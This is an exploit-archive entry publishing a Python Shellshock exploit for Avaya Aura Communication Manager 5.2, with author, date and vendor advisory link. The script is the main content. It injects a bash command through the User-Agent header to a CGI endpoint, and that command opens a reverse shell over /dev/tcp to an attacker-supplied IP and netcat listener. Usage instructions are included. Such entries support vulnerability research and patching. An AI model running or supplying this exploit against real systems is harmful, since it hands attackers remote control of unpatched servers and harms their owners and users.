Avaya Aura Communication Manager 5.2 Remote Code Execution

2020.02.18
Credit: Sarang Tumne
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution # Exploit Author: Sarang Tumne a.k.a SarT # Date: 2020-02-14 # Confirmed on release 5.2 # Vendor: https://www.avaya.com/en/ # Avaya's advisory: # https://downloads.avaya.com/css/P8/documents/100183151 # Exploit generates a reverse shell to a nc listener (Shellshock Exploit) ############################################### #!/usr/bin/python import sys import requests if len(sys.argv) < 4: print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit" print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337" print "[*] Netcat Listener: nc -lvvnp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() CM = sys.argv[1] url = "https://" + CM + "/mt/mt.cgi" attacker_ip = sys.argv[2] rev_port = sys.argv[3] http_headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1' } def main(): if len(sys.argv) == 4: print "[+] Success, spawning a shell on your custom port :)..." requests.get(url, headers=http_headers, verify=False, timeout=5) else: print "[-] Something went wrong, quitting..." sys.exit() if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top